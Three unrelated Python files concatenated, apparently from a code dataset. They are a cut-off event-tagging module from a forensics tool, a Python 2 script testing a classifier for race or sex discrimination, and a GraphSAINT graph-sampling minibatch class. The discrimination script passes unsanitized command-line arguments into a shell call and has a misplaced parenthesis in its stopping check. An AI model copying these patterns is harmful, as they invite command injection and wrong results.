utils.GetUnicodeString(msg_short), utils.GetUnicodeString(msg),
'Short', 'Long'))
out_write.append(u'{2:>7}: {0}\n{3:>7}: {1}\n'.format(
utils.GetUnicodeString(source_short),
utils.GetUnicodeString(source_long), 'Source Short', 'Source Long'))
if hasattr(self, 'pathspec'):
pathspec_string = self.pathspec.comparable
out_write.append(u'[Pathspec]:\n {0:s}\n'.format(
pathspec_string.replace('\n', '\n ')))
out_additional = []
out_write.append(u'[Reserved attributes]:')
out_additional.append(u'[Additional attributes]:')
for attr_key, attr_value in sorted(self.GetValues().items()):
if attr_key in utils.RESERVED_VARIABLES:
if attr_key == 'pathspec':
continue
else:
out_write.append(u' {{{key}}} {value}'.format(
key=attr_key, value=attr_value))
else:
out_additional.append(u' {{{key}}} {value}'.format(
key=attr_key, value=attr_value))
out_write.append(u'\n')
out_additional.append(u'')
part_1 = u'\n'.join(out_write)
part_2 = u'\n'.join(out_additional)
return part_1 + part_2
class EventTag(object):
"""A native Python object for the EventTagging protobuf.
The EventTag object should have the following attributes:
(optional attributes surrounded with brackets)
+ store_number: An integer, pointing to the store the EventObject is.
+ store_index: An index into the store where the EventObject is.
+ event_uuid: An UUID value of the event this tag belongs to.
+ [comment]: An arbitrary string containing comments about the event.
+ [color]: A string containing color information.
+ [tags]: A list of strings with tags, eg: 'Malware', 'Entry Point'.
The tag either needs to have an event_uuid defined or both the store_number
and store_index to be valid (not both, if both defined the store_number and
store_index will be used).
"""
# TODO: Enable __slots__ once we tested the first round of changes.
@property
def string_key(self):
"""Return a string index key for this tag."""
if not self.IsValidForSerialization():
return ''
uuid_string = getattr(self, 'event_uuid', None)
if uuid_string:
return uuid_string
return u'{}:{}'.format(self.store_number, self.store_index)
def GetString(self):
"""Retrieves a string representation of the event."""
ret = []
ret.append(u'-' * 50)
if getattr(self, 'store_number', 0):
ret.append(u'{0:>7}:\n\tNumber: {1}\n\tIndex: {2}'.format(
'Store', self.store_number, self.store_index))
else:
ret.append(u'{0:>7}:\n\tUUID: {1}'.format('Store', self.event_uuid))
if hasattr(self, 'comment'):
ret.append(u'{:>7}: {}'.format('Comment', self.comment))
if hasattr(self, 'color'):
ret.append(u'{:>7}: {}'.format('Color', self.color))
if hasattr(self, 'tags'):
ret.append(u'{:>7}: {}'.format('Tags', u','.join(self.tags)))
return u'\n'.join(ret)
def IsValidForSerialization(self):
"""Return whether or not this is a valid tag object."""
if getattr(self, 'event_uuid', None):
return True
if getattr(self, 'store_number', 0) and getattr(
self, 'store_index', -1) >= 0:
return True
return False
class PreprocessObject(object):
"""Object used to store all information gained from preprocessing."""
def __init__(self):
"""Initializes the preprocess object."""
super(PreprocessObject, self).__init__()
self._user_ids_to_names = None
self.zone = pytz.UTC
def GetUserMappings(self):
"""Returns a dictionary objects mapping SIDs or UIDs to usernames."""
if self._user_ids_to_names is None:
self._user_ids_to_names = {}
if self._user_ids_to_names:
return self._user_ids_to_names
for user in getattr(self, 'users', []):
if 'sid' in user:
user_id = user.get('sid', u'')
elif 'uid' in user:
user_id = user.get('uid', u'')
else:
user_id = u''
if user_id:
self._user_ids_to_names[user_id] = user.get('name', user_id)
return self._user_ids_to_names
def GetUsernameById(self, user_id):
"""Returns a username for a specific user identifier.
Args:
user_id: The user identifier, either a SID or UID.
Returns:
If available the user name for the identifier, otherwise the string '-'.
"""
user_ids_to_names = self.GetUserMappings()
return user_ids_to_names.get(user_id, '-')
# TODO: change to property with getter and setter.
def SetTimezone(self, timezone_identifier):
"""Sets the timezone.
Args:
timezone_identifier: string containing the identifier of the timezone,
e.g. 'UTC' or 'Iceland'.
"""
try:
self.zone = pytz.timezone(timezone_identifier)
except pytz.UnknownTimeZoneError as exception:
logging.warning(
u'Unable to set timezone: {0:s} with error: {1:s}.'.format(
timezone_identifier, exception))
def SetCollectionInformationValues(self, dict_object):
"""Sets the collection information values.
Args:
dict_object: dictionary object containing the collection information
values.
"""
self.collection_information = dict(dict_object)
if 'configure_zone' in self.collection_information:
self.collection_information['configure_zone'] = pytz.timezone(
self.collection_information['configure_zone'])
def SetCounterValues(self, dict_object):
"""Sets the counter values.
Args:
dict_object: dictionary object containing the counter values.
"""
self.counter = collections.Counter()
for key, value in dict_object.iteritems():
self.counter[key] = value
def SetPluginCounterValues(self, dict_object):
"""Sets the plugin counter values.
Args:
dict_object: dictionary object containing the plugin counter values.
"""
self.plugin_counter = collections.Counter()
for key, value in dict_object.iteritems():
self.plugin_counter[key] = value
# Named tuple that defines a parse error.
#
# Attributes:
# name: The parser or plugin name.
# description: The description of the error.
# path_spec: Optional path specification of the file entry (instance of
# dfvfs.PathSpec). The default is None.
ParseError = collections.namedtuple(
'ParseError', 'name description path_spec')
|
'''
Group discrimination testing for Subject System A
Inputs :
argv[1] : Train file
argv[2] : Sensitive argument
argv[3] : Argument to test discriminationa gainst
For argv[2] and argv[3] : 8 means race and 9 means gender
'''
from __future__ import division
from random import seed, shuffle
import random
import math
import os
from collections import defaultdict
from sklearn import svm
import os,sys
import urllib2
sys.path.insert(0, './fair_classification/') # the code for fair classification is in this directory
import utils as ut
import numpy as np
import itertools
import loss_funcs as lf # loss funcs that can be optimized subject to various constraints
import commands
sens_arg = int(sys.argv[2])
fixval = int(sys.argv[3])
#set prinsuite to 0 to not print the test suite
printsuite = 1
#Minimum number of inputs tos tart applying the confidence check optimization
minInp = 50000
#Maximum number of inputs to test against
max_inp=50000
#Training file
trainfile = sys.argv[1]
#Output file for the test suite
outputfile = "../Suites/freshA"+str(sens_arg)+str(fixval)
random.seed(12)
if(sens_arg== 9):
name = 'sex'
cov=0
else:
name = 'race'
cov = [0.2,0.2,0.2,0.2,0.2,0.2]
X=[]
Y=[]
i=0
sensitive = {};
sens = []
option=4
with open(trainfile, "r") as ins:
for line in ins:
line = line.strip()
line1 = line.split(',')
if(i==0):
i+=1
continue
L = map(int,line1[:-1])
sens.append(L[sens_arg-1])
#L[sens_arg-1]=-1
X.append(L)
if(int(line1[-1])==0):
Y.append(-1)
else:
Y.append(1)
X = np.array(X, dtype=float);
Y = np.array(Y, dtype = float);
sensitive[name] = np.array(sens, dtype = float);
loss_function = lf._logistic_loss;
sep_constraint = 0;
sensitive_attrs = [name];
sensitive_attrs_to_cov_thresh = {name:cov};
gamma=None
w = ut.train_model(X, Y, sensitive, loss_function, 1, 0, sep_constraint, sensitive_attrs, sensitive_attrs_to_cov_thresh, gamma);
num_atr=[10,8,70,16,7,14,6,5,2,100,40,100,40]
map={}
f = open(outputfile,"w")
already = "../Suites/A"+str(sens_arg)+str(fixval)
def check_ratio(fixed):
fix_atr = []
if option==3 or option==4:
fpr = open(already,"r")
done = {}
for line in fpr:
line = line.strip()
line = line.split(',')
line = ','.join(line[:-1])
line+=','
done[line]=1
if fixval==9:
pos=[0,0]
neg=[0,0]
else:
pos=[0,0,0,0,0]
neg=[0,0,0,0,0]
for inp in done.keys():
strinp = inp
inp = inp.split(',')
inp=inp[:-1]
i=0
inpstr=''
while i<len(inp):
inpstr+=inp[i]+' '
inp[i] = int(inp[i])
i+=1
if option==3:
out = np.sign(np.dot(w, inp))
else:
out = commands.getoutput("python Atestcensus.py "+sys.argv[1]+" "+sys.argv[2]+" "+inpstr)
if(out>0):
pos[inp[fixval-1]]+=1
else:
neg[inp[fixval-1]]+=1
if printsuite==1:
f.write(strinp+" "+str(out)+"\n")
i=0
maxv = 0
minv = 1
while i<len(pos):
#print pos[i],neg[i]
v = pos[i]*1.0/(pos[i]+neg[i])
if v > maxv :
maxv = v
if v < minv:
minv = v
i+=1
print "score is ",100*(maxv-minv)
return
num=1
for i in range(0,len(fixed)):
if(fixed[i]==1):
num = num*num_atr[i]
fix_atr.append(i)
val = 0
max = -1
min = 100
#print num
while val< num:
inp_fix=['','','','','','','','','','','','','']
i=len(fix_atr)-1
tmp_val = val
while i>=0:
inp_fix[fix_atr[i]] = tmp_val%num_atr[fix_atr[i]]
tmp_val = (tmp_val - tmp_val%num_atr[fix_atr[i]])/num_atr[fix_atr[i]]
i-=1
#print inp_fix
val+=1
inp=['','','','','','','','','','','','','']
num_inp = 0
pos = 0
neg = 0
for i3 in range(0, max_inp) :
#print inp_fix
if(num_inp>=max_inp):
break;
j=0
while j<len(num_atr):
if inp_fix[j]=='':
inp[j] = (random.randint(0,num_atr[j]-1))
else:
inp[j]=inp_fix[j]
j+=1
num_inp+=1
str1=""
strinp=""
for x in inp:
str1 += str(x)+","
strinp+=str(x)+" "
if option ==1 :
out = commands.getoutput("python Atestcensus.py "+sys.argv[1]+" "+sys.argv[2]+" "+strinp)
else:
out = np.sign(np.dot(w, inp))
if printsuite==1:
f.write(str1+" "+str(out)+"\n")
#print str1,out
if(out>0):
#print inp, out, 1
map[','.join(str(inp))] = 1
pos+=1
else:
#print inp,out, 0
map[','.join(str(inp))] = 0
neg+=1
frac=pos*1.0/(pos+neg)
if 2.5*math.sqrt(frac*(1-frac)*1.0/(pos+neg)<0.05) and pos+neg>minInp:
break
if(pos*1.0/(pos+neg)>max):
max = pos*1.0/(pos+neg)
if(pos*1.0/(pos+neg)<min):
min = pos*1.0/(pos+neg)
#print (max-min)*100
def findsubsets(S,m):
return set(itertools.combinations(S, m))
if(sens_arg==9 and fixval==8):
fixed = [0,0,0,0,0,0,0,1,0,0,0,0,0]
elif (sens_arg==9 and fixval==9):
fixed = [0,0,0,0,0,0,0,0,1,0,0,0,0]
elif (sens_arg==8 and fixval==9):
fixed = [0,0,0,0,0,0,0,0,1,0,0,0,0]
else:
fixed = [0,0,0,0,0,0,0,1,0,0,0,0,0]
check_ratio(fixed)
print "output written in ", outputfile
f.close()
|
<gh_stars>0
from graphsaint.globals import *
import math
from graphsaint.utils import *
from graphsaint.graph_samplers import *
from graphsaint.norm_aggr import *
import torch
import scipy.sparse as sp
import scipy
import numpy as np
import time
def _coo_scipy2torch(adj):
"""
convert a scipy sparse COO matrix to torch
"""
values = adj.data
indices = np.vstack((adj.row, adj.col))
i = torch.LongTensor(indices)
v = torch.FloatTensor(values)
return torch.sparse.FloatTensor(i,v, torch.Size(adj.shape))
class Minibatch:
"""
Provides minibatches for the trainer or evaluator. This class is responsible for
calling the proper graph sampler and estimating normalization coefficients.
"""
def __init__(self, adj_full_norm, adj_train, role, train_params, cpu_eval=False):
"""
Inputs:
adj_full_norm scipy CSR, adj matrix for the full graph (row-normalized)
adj_train scipy CSR, adj matrix for the traing graph. Since we are
under transductive setting, for any edge in this adj,
both end points must be training nodes.
role dict, key 'tr' -> list of training node IDs;
key 'va' -> list of validation node IDs;
key 'te' -> list of test node IDs.
train_params dict, additional parameters related to training. e.g.,
how many subgraphs we want to get to estimate the norm
coefficients.
cpu_eval bool, whether or not we want to run full-batch evaluation
on the CPU.
Outputs:
None
"""
self.use_cuda = (Globals.args_global.gpu >= 0)
if cpu_eval:
self.use_cuda=False
self.node_train = np.array(role['tr'])
self.node_val = np.array(role['va'])
self.node_test = np.array(role['te'])
self.adj_full_norm = _coo_scipy2torch(adj_full_norm.tocoo())
self.adj_train = adj_train
# -----------------------
# sanity check (optional)
# -----------------------
#for role_set in [self.node_val, self.node_test]:
# for v in role_set:
# assert self.adj_train.indptr[v+1] == self.adj_train.indptr[v]
#_adj_train_T = sp.csr_matrix.tocsc(self.adj_train)
#assert np.abs(_adj_train_T.indices - self.adj_train.indices).sum() == 0
#assert np.abs(_adj_train_T.indptr - self.adj_train.indptr).sum() == 0
#_adj_full_T = sp.csr_matrix.tocsc(adj_full_norm)
#assert np.abs(_adj_full_T.indices - adj_full_norm.indices).sum() == 0
#assert np.abs(_adj_full_T.indptr - adj_full_norm.indptr).sum() == 0
#printf("SANITY CHECK PASSED", style="yellow")
if self.use_cuda:
# now i put everything on GPU. Ideally, full graph adj/feat
# should be optionally placed on CPU
self.adj_full_norm = self.adj_full_norm.cuda()
# below: book-keeping for mini-batch
self.node_subgraph = None
self.batch_num = -1
self.method_sample = None
self.subgraphs_remaining_indptr = []
self.subgraphs_remaining_indices = []
self.subgraphs_remaining_data = []
self.subgraphs_remaining_nodes = []
self.subgraphs_remaining_edge_index = []
self.norm_loss_train = np.zeros(self.adj_train.shape[0])
# norm_loss_test is used in full batch evaluation (without sampling).
# so neighbor features are simply averaged.
self.norm_loss_test = np.zeros(self.adj_full_norm.shape[0])
_denom = len(self.node_train) + len(self.node_val) + len(self.node_test)
if len(self.node_train):
self.norm_loss_test[self.node_train] = 1. / _denom
self.norm_loss_test[self.node_val] = 1. / _denom
if len(self.node_test):
self.norm_loss_test[self.node_test] = 1. / _denom
self.norm_loss_test = torch.from_numpy(self.norm_loss_test.astype(np.float32))
if self.use_cuda:
self.norm_loss_test = self.norm_loss_test.cuda()
self.norm_aggr_train = np.zeros(self.adj_train.size)
self.sample_coverage = train_params['sample_coverage']
self.deg_train = np.array(self.adj_train.sum(1)).flatten()
def set_sampler(self, train_phases):
"""
Pick the proper graph sampler. Run the warm-up phase to estimate
loss / aggregation normalization coefficients.
Inputs:
train_phases dict, config / params for the graph sampler
Outputs:
None
"""
self.subgraphs_remaining_indptr = []
self.subgraphs_remaining_indices = []
self.subgraphs_remaining_data = []
self.subgraphs_remaining_nodes = []
self.subgraphs_remaining_edge_index = []
self.method_sample = train_phases['sampler']
if self.method_sample == 'mrw':
if 'deg_clip' in train_phases:
_deg_clip = int(train_phases['deg_clip'])
else:
_deg_clip = 100000 # setting this to a large number so essentially there is no clipping in probability
self.size_subg_budget = train_phases['size_subgraph']
self.graph_sampler = mrw_sampling(
self.adj_train,
self.node_train,
self.size_subg_budget,
train_phases['size_frontier'],
_deg_clip,
)
elif self.method_sample == 'rw':
self.size_subg_budget = train_phases['num_root'] * train_phases['depth']
self.graph_sampler = rw_sampling(
self.adj_train,
self.node_train,
self.size_subg_budget,
int(train_phases['num_root']),
int(train_phases['depth']),
)
elif self.method_sample == 'edge':
self.size_subg_budget = train_phases['size_subg_edge'] * 2
self.graph_sampler = edge_sampling(
self.adj_train,
self.node_train,
train_phases['size_subg_edge'],
)
elif self.method_sample == 'node':
self.size_subg_budget = train_phases['size_subgraph']
self.graph_sampler = node_sampling(
self.adj_train,
self.node_train,
self.size_subg_budget,
)
elif self.method_sample == 'full_batch':
self.size_subg_budget = self.node_train.size
self.graph_sampler = full_batch_sampling(
self.adj_train,
self.node_train,
self.size_subg_budget,
)
elif self.method_sample == "vanilla_node_python":
self.size_subg_budget = train_phases["size_subgraph"]
self.graph_sampler = NodeSamplingVanillaPython(
self.adj_train,
self.node_train,
self.size_subg_budget,
)
else:
raise NotImplementedError
self.norm_loss_train = np.zeros(self.adj_train.shape[0])
self.norm_aggr_train = np.zeros(self.adj_train.size).astype(np.float32)
# -------------------------------------------------------------
# BELOW: estimation of loss / aggregation normalization factors
# -------------------------------------------------------------
# For some special sampler, no need to estimate norm factors, we can calculate
# the node / edge probabilities directly.
# However, for integrity of the framework, we follow the same procedure
# for all samplers:
# 1. sample enough number of subgraphs
# 2. update the counter for each node / edge in the training graph
# 3. estimate norm factor alpha and lambda
tot_sampled_nodes = 0
while True:
self.par_graph_sample('train')
tot_sampled_nodes = sum([len(n) for n in self.subgraphs_remaining_nodes])
if tot_sampled_nodes > self.sample_coverage * self.node_train.size:
break
num_subg = len(self.subgraphs_remaining_nodes)
for i in range(num_subg):
self.norm_aggr_train[self.subgraphs_remaining_edge_index[i]] += 1
self.norm_loss_train[self.subgraphs_remaining_nodes[i]] += 1
if len(self.node_test):
assert self.norm_loss_train[self.node_val].sum() + self.norm_loss_train[self.node_test].sum() == 0
else:
assert self.norm_loss_train[self.node_val].sum() == 0
for v in range(self.adj_train.shape[0]):
i_s = self.adj_train.indptr[v]
i_e = self.adj_train.indptr[v + 1]
val = np.clip(self.norm_loss_train[v] / self.norm_aggr_train[i_s : i_e], 0, 1e4)
val[np.isnan(val)] = 0.1
self.norm_aggr_train[i_s : i_e] = val
self.norm_loss_train[np.where(self.norm_loss_train==0)[0]] = 0.1
self.norm_loss_train[self.node_val] = 0
if len(self.node_test):
self.norm_loss_train[self.node_test] = 0
self.norm_loss_train[self.node_train] = num_subg / self.norm_loss_train[self.node_train] / self.node_train.size
self.norm_loss_train = torch.from_numpy(self.norm_loss_train.astype(np.float32))
if self.use_cuda:
self.norm_loss_train = self.norm_loss_train.cuda()
def par_graph_sample(self,phase):
"""
Perform graph sampling in parallel. A wrapper function for graph_samplers.py
"""
t0 = time.time()
_indptr, _indices, _data, _v, _edge_index = self.graph_sampler.par_sample(phase)
t1 = time.time()
print('sampling 200 subgraphs: time = {:.3f} sec'.format(t1 - t0), end="\r")
self.subgraphs_remaining_indptr.extend(_indptr)
self.subgraphs_remaining_indices.extend(_indices)
self.subgraphs_remaining_data.extend(_data)
self.subgraphs_remaining_nodes.extend(_v)
self.subgraphs_remaining_edge_index.extend(_edge_index)
def one_batch(self, mode='train'):
"""
Generate one minibatch for trainer. In the 'train' mode, one minibatch corresponds
to one subgraph of the training graph. In the 'val' or 'test' mode, one batch
corresponds to the full graph (i.e., full-batch rather than minibatch evaluation
for validation / test sets).
Inputs:
mode str, can be 'train', 'val', 'test' or 'valtest'
Outputs:
node_subgraph np array, IDs of the subgraph / full graph nodes
adj scipy CSR, adj matrix of the subgraph / full graph
norm_loss np array, loss normalization coefficients. In 'val' or
'test' modes, we don't need to normalize, and so the values
in this array are all 1.
"""
if mode in ['val','test','valtest']:
self.node_subgraph = np.arange(self.adj_full_norm.shape[0])
adj = self.adj_full_norm
else:
assert mode == 'train'
if len(self.subgraphs_remaining_nodes) == 0:
self.par_graph_sample('train')
print()
self.node_subgraph = self.subgraphs_remaining_nodes.pop()
self.size_subgraph = len(self.node_subgraph)
adj = sp.csr_matrix(
(
self.subgraphs_remaining_data.pop(),
self.subgraphs_remaining_indices.pop(),
self.subgraphs_remaining_indptr.pop()),
shape=(self.size_subgraph,self.size_subgraph,
)
)
adj_edge_index = self.subgraphs_remaining_edge_index.pop()
#print("{} nodes, {} edges, {} degree".format(self.node_subgraph.size,adj.size,adj.size/self.node_subgraph.size))
norm_aggr(adj.data, adj_edge_index, self.norm_aggr_train, num_proc=Globals.args_global.num_cpu_core)
# adj.data[:] = self.norm_aggr_train[adj_edge_index][:] # this line is interchangable with the above line
adj = adj_norm(adj, deg=self.deg_train[self.node_subgraph])
adj = _coo_scipy2torch(adj.tocoo())
if self.use_cuda:
adj = adj.cuda()
self.batch_num += 1
norm_loss = self.norm_loss_test if mode in ['val','test', 'valtest'] else self.norm_loss_train
norm_loss = norm_loss[self.node_subgraph]
return self.node_subgraph, adj, norm_loss
def num_training_batches(self):
return math.ceil(self.node_train.shape[0] / float(self.size_subg_budget))
def shuffle(self):
self.node_train = np.random.permutation(self.node_train)
self.batch_num = -1
def end(self):
return (self.batch_num + 1) * self.size_subg_budget >= self.node_train.shape[0]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.